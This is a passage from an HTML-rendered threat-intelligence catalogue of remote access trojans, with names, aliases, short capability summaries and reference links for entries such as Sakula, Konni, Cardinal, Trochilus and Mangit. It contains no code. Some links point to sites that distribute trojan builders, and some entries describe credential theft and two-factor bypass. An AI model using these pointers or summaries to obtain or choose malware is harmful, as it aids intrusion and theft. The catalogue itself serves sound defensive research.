<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.megasecurity.org/trojans/m/mega/Megatrojan1.0.html">http://www.megasecurity.org/trojans/m/mega/Megatrojan1.0.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_venomous_ivy"><a class="anchor" href="#_venomous_ivy"></a><a class="link" href="#_venomous_ivy">Venomous Ivy</a></h3>
</div>
<div class="sect2">
<h3 id="_xploit"><a class="anchor" href="#_xploit"></a><a class="link" href="#_xploit">Xploit</a></h3>
</div>
<div class="sect2">
<h3 id="_arctic_r_a_t"><a class="anchor" href="#_arctic_r_a_t"></a><a class="link" href="#_arctic_r_a_t">Arctic R.A.T.</a></h3>
<div class="paragraph">
<p>Arctic R.A.T. is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Artic</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2302. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://anti-virus-soft.com/threats/artic">http://anti-virus-soft.com/threats/artic</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_golden_phoenix"><a class="anchor" href="#_golden_phoenix"></a><a class="link" href="#_golden_phoenix">GOlden Phoenix</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2303. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2014/02/golden-phoenix-rat-0.2.html">http://www.connect-trojan.net/2014/02/golden-phoenix-rat-0.2.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_graphicbooting"><a class="anchor" href="#_graphicbooting"></a><a class="link" href="#_graphicbooting">GraphicBooting</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2304. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2014/10/graphicbooting-rat-v0.1-beta.html?m=0">http://www.connect-trojan.net/2014/10/graphicbooting-rat-v0.1-beta.html?m=0</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pocket_rat"><a class="anchor" href="#_pocket_rat"></a><a class="link" href="#_pocket_rat">Pocket RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_erebus"><a class="anchor" href="#_erebus"></a><a class="link" href="#_erebus">Erebus</a></h3>
</div>
<div class="sect2">
<h3 id="_sharpeye"><a class="anchor" href="#_sharpeye"></a><a class="link" href="#_sharpeye">SharpEye</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2305. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2014/10/sharpeye-rat-1.0-beta-1.html">http://www.connect-trojan.net/2014/10/sharpeye-rat-1.0-beta-1.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2014/02/sharpeye-rat-1.0-beta-2.html">http://www.connect-trojan.net/2014/02/sharpeye-rat-1.0-beta-2.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vortex_2"><a class="anchor" href="#_vortex_2"></a><a class="link" href="#_vortex_2">VorteX</a></h3>
</div>
<div class="sect2">
<h3 id="_archelaus_beta"><a class="anchor" href="#_archelaus_beta"></a><a class="link" href="#_archelaus_beta">Archelaus Beta</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2306. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2014/02/archelaus-rat-beta.html">http://www.connect-trojan.net/2014/02/archelaus-rat-beta.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blackhole_2"><a class="anchor" href="#_blackhole_2"></a><a class="link" href="#_blackhole_2">BlackHole</a></h3>
<div class="paragraph">
<p>C# RAT (Remote Adminitration Tool) - Educational purposes only</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2307. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/hussein-aitlahcen/BlackHole">https://github.com/hussein-aitlahcen/BlackHole</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vanguard"><a class="anchor" href="#_vanguard"></a><a class="link" href="#_vanguard">Vanguard</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2308. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://ktwox7.blogspot.lu/2010/12/vanguard-remote-administration.html">http://ktwox7.blogspot.lu/2010/12/vanguard-remote-administration.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ahtapod"><a class="anchor" href="#_ahtapod"></a><a class="link" href="#_ahtapod">Ahtapod</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2309. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.ibtimes.co.uk/turkish-journalist-baris-pehlivan-jailed-terrorism-was-framed-by-hackers-says-report-1577481">http://www.ibtimes.co.uk/turkish-journalist-baris-pehlivan-jailed-terrorism-was-framed-by-hackers-says-report-1577481</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_finspy"><a class="anchor" href="#_finspy"></a><a class="link" href="#_finspy">FINSPY</a></h3>
<div class="paragraph">
<p>Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2310. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html">https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_seed_rat"><a class="anchor" href="#_seed_rat"></a><a class="link" href="#_seed_rat">Seed RAT</a></h3>
<div class="paragraph">
<p>Seed is a firewall bypass plus trojan, injects into default browser and has a simple purpose: to be compact (4kb server size) and useful while uploading bigger and full trojans, or even making Seed download them somewhere. Has computer info, process manager, file manager, with download, create folder, delete, execute and upload. And a remote download function. Everything with a easy to use interface, reminds an instant messenger.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2311. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nuclearwintercrew.com/Products-View/25/Seed_1.1/">http://www.nuclearwintercrew.com/Products-View/25/Seed_1.1/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sharpbot"><a class="anchor" href="#_sharpbot"></a><a class="link" href="#_sharpbot">SharpBot</a></h3>
</div>
<div class="sect2">
<h3 id="_torct_php_rat"><a class="anchor" href="#_torct_php_rat"></a><a class="link" href="#_torct_php_rat">TorCT PHP RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2312. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/alienwithin/torCT-PHP-RAT">https://github.com/alienwithin/torCT-PHP-RAT</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_a32s_rat"><a class="anchor" href="#_a32s_rat"></a><a class="link" href="#_a32s_rat">A32s RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_char0n"><a class="anchor" href="#_char0n"></a><a class="link" href="#_char0n">Char0n</a></h3>
</div>
<div class="sect2">
<h3 id="_nytro"><a class="anchor" href="#_nytro"></a><a class="link" href="#_nytro">Nytro</a></h3>
</div>
<div class="sect2">
<h3 id="_syla"><a class="anchor" href="#_syla"></a><a class="link" href="#_syla">Syla</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2313. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2013/07/syla-rat-0.3.html">http://www.connect-trojan.net/2013/07/syla-rat-0.3.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_2"><a class="anchor" href="#_cobalt_strike_2"></a><a class="link" href="#_cobalt_strike_2">Cobalt Strike</a></h3>
<div class="paragraph">
<p>Cobalt Strike is software for Adversary Simulations and Red Team Operations.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2314. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cobaltstrike.com/">https://www.cobaltstrike.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sakula_2"><a class="anchor" href="#_sakula_2"></a><a class="link" href="#_sakula_2">Sakula</a></h3>
<div class="paragraph">
<p>The RAT, which according to compile timestamps first surfaced in November 2012, has been used in targeted intrusions through 2015. Sakula enables an adversary to run interactive commands as well as to download and execute additional components.</p>
</div>
<div class="paragraph">
<p>Sakula is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sakurel</p>
</li>
<li>
<p>VIPER</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2315. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/sakula-malware-family">https://www.secureworks.com/research/sakula-malware-family</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hcdloader_2"><a class="anchor" href="#_hcdloader_2"></a><a class="link" href="#_hcdloader_2">hcdLoader</a></h3>
<div class="paragraph">
<p>hcdLoader is a remote access tool (RAT) that has been used by APT18.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2316. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0071">https://attack.mitre.org/wiki/Software/S0071</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crimson_2"><a class="anchor" href="#_crimson_2"></a><a class="link" href="#_crimson_2">Crimson</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2317. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2015/01/crimson-rat-3.0.0.html">http://www.connect-trojan.net/2015/01/crimson-rat-3.0.0.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kjw0rm"><a class="anchor" href="#_kjw0rm"></a><a class="link" href="#_kjw0rm">KjW0rm</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2318. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://hack-defender.blogspot.fr/2015/12/kjw0rm-v05x.html">http://hack-defender.blogspot.fr/2015/12/kjw0rm-v05x.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ghost_2"><a class="anchor" href="#_ghost_2"></a><a class="link" href="#_ghost_2">Ghost</a></h3>
<div class="paragraph">
<p>Ghost is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ucul</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2319. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.youtube.com/watch?v=xXZW4ajVYkI">https://www.youtube.com/watch?v=xXZW4ajVYkI</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_9002"><a class="anchor" href="#_9002"></a><a class="link" href="#_9002">9002</a></h3>
</div>
<div class="sect2">
<h3 id="_sandro_rat"><a class="anchor" href="#_sandro_rat"></a><a class="link" href="#_sandro_rat">Sandro RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_mega"><a class="anchor" href="#_mega"></a><a class="link" href="#_mega">Mega</a></h3>
</div>
<div class="sect2">
<h3 id="_wirat"><a class="anchor" href="#_wirat"></a><a class="link" href="#_wirat">WiRAT</a></h3>
</div>
<div class="sect2">
<h3 id="_3para_rat_2"><a class="anchor" href="#_3para_rat_2"></a><a class="link" href="#_3para_rat_2">3PARA RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2320. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://books.google.fr/books?isbn=2212290136">https://books.google.fr/books?isbn=2212290136</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bbs_rat"><a class="anchor" href="#_bbs_rat"></a><a class="link" href="#_bbs_rat">BBS RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_konni"><a class="anchor" href="#_konni"></a><a class="link" href="#_konni">Konni</a></h3>
<div class="paragraph">
<p>KONNI is a remote access Trojan (RAT) that was first reported in May of 2017, but is believed to have been in use for over 3 years. As Part of our daily threat monitoring, FortiGuard Labs came across a new variant of the KONNI RAT and decided to take a deeper look.</p>
</div>
<div class="paragraph">
<p>Konni is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>KONNI</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2321. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant">https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/en_us/blog/threat-spotlight-konni-stealthy-remote-access-trojan.html">https://www.cylance.com/en_us/blog/threat-spotlight-konni-stealthy-remote-access-trojan.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/">https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html">http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_felismus_rat"><a class="anchor" href="#_felismus_rat"></a><a class="link" href="#_felismus_rat">Felismus RAT</a></h3>
<div class="paragraph">
<p>Used by Sowbug</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2322. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments">https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xsser"><a class="anchor" href="#_xsser"></a><a class="link" href="#_xsser">Xsser</a></h3>
<div class="paragraph">
<p>Xsser mRAT is a piece of malware that targets iOS devices that have software limitations removed. The app is installed via a rogue repository on Cydia, the most popular third-party application store for jailbroken iPhones. Once the malicious bundle has been installed and executed, it gains persistence - preventing the user from deleting it. The mRAT then makes server-side checks and proceeds to steal data from the user&#8217;s device and executes remote commands as directed by its command-and-control (C2) server.</p>
</div>
<div class="paragraph">
<p>Xsser is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>mRAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2323. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.akamai.com/2014/12/ios-and-android-os-targeted-by-man-in-the-middle-attacks.html">https://blogs.akamai.com/2014/12/ios-and-android-os-targeted-by-man-in-the-middle-attacks.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.wikia.com/wiki/Xsser_mRAT">http://malware.wikia.com/wiki/Xsser_mRAT</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_govrat"><a class="anchor" href="#_govrat"></a><a class="link" href="#_govrat">GovRAT</a></h3>
<div class="paragraph">
<p>GovRAT is an old cyberespionage tool, it has been in the wild since 2014 and it was used by various threat actors across the years.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2324. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://securityaffairs.co/wordpress/41714/cyber-crime/govrat-platform.html">http://securityaffairs.co/wordpress/41714/cyber-crime/govrat-platform.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://securityaffairs.co/wordpress/51202/cyber-crime/govrat-2-0-attacks.html">http://securityaffairs.co/wordpress/51202/cyber-crime/govrat-2-0-attacks.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rottie3"><a class="anchor" href="#_rottie3"></a><a class="link" href="#_rottie3">Rottie3</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2325. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.youtube.com/watch?v=jUg5&#8212;&#8203;68Iqs">https://www.youtube.com/watch?v=jUg5&#8212;&#8203;68Iqs</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_killer_rat"><a class="anchor" href="#_killer_rat"></a><a class="link" href="#_killer_rat">Killer RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_hi_zor_2"><a class="anchor" href="#_hi_zor_2"></a><a class="link" href="#_hi_zor_2">Hi-Zor</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2326. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat">https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_quaverse"><a class="anchor" href="#_quaverse"></a><a class="link" href="#_quaverse">Quaverse</a></h3>
<div class="paragraph">
<p>Quaverse RAT or QRAT is a fairly new Remote Access Tool (RAT) introduced in May 2015. This RAT is marketed as an undetectable Java RAT. As you might expect from a RAT, the tool is capable of grabbing passwords, key logging and browsing files on the victim&#8217;s computer. On a regular basis for the past several months, we have observed the inclusion of QRAT in a number of spam campaigns.</p>
</div>
<div class="paragraph">
<p>Quaverse is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>QRAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2327. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT&#8212;&#8203;Remote-Access-as-a-Service/">https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT&#8212;&#8203;Remote-Access-as-a-Service/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_heseber"><a class="anchor" href="#_heseber"></a><a class="link" href="#_heseber">Heseber</a></h3>
</div>
<div class="sect2">
<h3 id="_cardinal"><a class="anchor" href="#_cardinal"></a><a class="link" href="#_cardinal">Cardinal</a></h3>
<div class="paragraph">
<p>Cardinal is a remote access trojan (RAT) discovered by Palo Alto Networks in 2017 and has been active for over two years. It is delivered via a downloader, known as Carp, and uses malicious macros in Microsoft Excel documents to compile embedded C# programming language source code into an executable that runs and deploys the Cardinal RAT. The malicious Excel files use different tactics to get the victims to execute it.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2328. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/">https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.scmagazine.com/cardinal-rats-unique-downloader-allowed-it-to-avoid-detection-for-years/article/651927/">https://www.scmagazine.com/cardinal-rats-unique-downloader-allowed-it-to-avoid-detection-for-years/article/651927/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cyber.nj.gov/threat-profiles/trojan-variants/cardinal">https://www.cyber.nj.gov/threat-profiles/trojan-variants/cardinal</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_omnirat"><a class="anchor" href="#_omnirat"></a><a class="link" href="#_omnirat">OmniRAT</a></h3>
<div class="paragraph">
<p>Works on all Android, Windows, Linux and Mac devices!</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2329. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://omnirat.eu/en/">https://omnirat.eu/en/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jfect"><a class="anchor" href="#_jfect"></a><a class="link" href="#_jfect">Jfect</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2330. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.youtube.com/watch?v=qKdoExQFb68">https://www.youtube.com/watch?v=qKdoExQFb68</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trochilus"><a class="anchor" href="#_trochilus"></a><a class="link" href="#_trochilus">Trochilus</a></h3>
<div class="paragraph">
<p>Trochilus is a remote access trojan (RAT) first identified in October 2015 when attackers used it to infect visitors of a Myanmar website. It was then used in a 2016 cyber-espionage campaign, dubbed "the Seven Pointed Dagger," managed by another group, "Group 27," who also uses the PlugX trojan. Trochilus is primarily spread via emails with a malicious .RAR attachment containing the malware. The trojan&#8217;s functionality includes a shellcode extension, remote uninstall, a file manager, and the ability to download and execute, upload and execute, and access the system information. Once present on a system, Trochilus can move laterally in the network for better access. This trojan operates in memory only and does not write to the disk, helping it evade detection.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2331. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/">https://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://securityaffairs.co/wordpress/43889/cyber-crime/new-rat-trochilus.html">http://securityaffairs.co/wordpress/43889/cyber-crime/new-rat-trochilus.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_matryoshka"><a class="anchor" href="#_matryoshka"></a><a class="link" href="#_matryoshka">Matryoshka</a></h3>
<div class="paragraph">
<p>Their most commonly used initial attack vector is a simple, yet alarmingly effective, spearphishing attack, infecting unsuspecting victims via a malicious email attachment (usually an executable that has been disguised as something else). From there, Matryoshka runs second stage malware via a dropper and covertly installs a Remote Access Toolkit (RAT). This is done using a reflective loader technique that allows the malware to run in process memory, rather than being written to disk. This not only hides the install of the RAT but also ensures that the RAT will be reinstalled after system restart.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2332. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.alienvault.com/blogs/security-essentials/matryoshka-malware-from-copykittens-group">https://www.alienvault.com/blogs/security-essentials/matryoshka-malware-from-copykittens-group</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mangit"><a class="anchor" href="#_mangit"></a><a class="link" href="#_mangit">Mangit</a></h3>
<div class="paragraph">
<p>First discovered by Trend Micro in June, Mangit is a new malware family being marketed on both the Dark web and open internet. Users have the option to rent the trojan&#8217;s infrastructure for about $600 per 10-day period or buy the source code for about $8,800. Mangit was allegedly developed by "Ric", a Brazilian hacker, who makes himself available via Skype to discuss rental agreements. Once the malware is rented or purchased, the user controls a portion of the Mangit botnet, the trojan, the dropper, an auto-update system, and the server infrastructure to run their attacks. Mangit contains support for nine Brazillian banks including Citibank, HSBC, and Santander. The malware can also be used to steal user PayPal credentials. Mangit has the capability to collect banking credentials, receive SMS texts when a victim is accessing their bank account, and take over victim&#8217;s browsers. To circumvent two-factor authentication, attackers can use Mangit to lock victim&#8217;s browsers and push pop-ups to the victim asking for the verification code they just received.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2333. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
